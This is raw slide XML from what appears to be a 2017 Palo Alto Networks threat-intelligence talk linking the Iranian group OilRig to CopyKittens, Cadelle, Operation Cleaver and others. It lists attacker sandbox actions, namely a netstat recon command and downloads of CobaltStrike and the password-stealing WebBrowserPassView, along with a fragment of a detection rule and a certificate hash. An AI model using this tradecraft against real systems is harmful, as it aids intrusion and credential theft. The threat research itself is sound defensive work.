            <a:ext cx="0" cy="54864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4960" y="3384229"/>
            <a:ext cx="8514081" cy="1384995"/>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AI Squared signed copy of </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">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PSExec</a:t>
            </a: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2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>No apparent use.</a:t>
            </a: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800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1523830" y="1189875"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3860857" y="1240676"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3037841"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p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5303520" y="1981200"/>
            <a:ext cx="609598" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350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6055188" y="1262265"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2594186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Attacker Interactions in Sandbox</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469938" y="782320"/>
            <a:ext cx="8572461"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CobaltStrike download</a:t>
            </a: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WebBrowserPassView download</a:t>
            </a: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Basic recon</a:t>
            </a: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Windows\system32\cmd.exe /C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>anto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | find ESTABLISHED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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Directory listings, deletes original dropper from system </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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48019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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469938" y="263336"/>
            <a:ext cx="8572461" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="7200" b="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LINKING OILRIG TO OTHER IRANIAN THREATS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1774988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WHO ARE COPYKITTENS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="232001" y="752700"/>
            <a:ext cx="5739227" cy="3463699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4481313" y="1262742"/>
            <a:ext cx="4210148" cy="3679371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295620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lang="en-US" sz="2200" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OILRIG to COPYKITTENS</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="794278"/>
            <a:ext cx="9144000" cy="3554944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="862607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Link to “CADELLE”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="353060" y="1204913"/>
            <a:ext cx="3911004" cy="2300288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5796302" y="0"/>
            <a:ext cx="2082755" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469939" y="3921760"/>
            <a:ext cx="5588000" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“It’s unclear how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cadelle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> infects its targets with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Backdoor.Cadelspy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>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747573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469939" y="282965"/>
            <a:ext cx="8471427" cy="327420"/>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l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2200" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OilRig Conclusions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469939" y="975360"/>
            <a:ext cx="7863840"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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Targets across the world, those outside of the Middle East often have a vested interest in either Iran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, Israel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or Saudi Arabia.</a:t>
            </a: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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ~= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CopyKittens</a:t>
            </a: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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ~= CADELLE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ~= Operation Cleaver (The “Clark Kent” effect)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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255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1" y="205981"/>
            <a:ext cx="8471427" cy="327420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Why should you care about Iranian threats?</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4</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="417443" y="824947"/>
            <a:ext cx="7354956"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Targeting mainly local (Middle East), but also global.</a:t>
            </a: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Defend against all the threats.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>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Destructive attacks.</a:t>
            </a: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solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35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26616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Other Iran Threats…</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40</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>INFY, still active (Dec 2016 and Feb 2017)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      $a1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[0-9]{4}\.exe/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fullword</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       $a2 = "readme.txt" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fullword</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       $a3 = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pub.key</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fullword</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GREENBUG, still active despite public analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   SSLCERT: 7b130344829d2e9cff3c35531d93f5c3fda7434f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
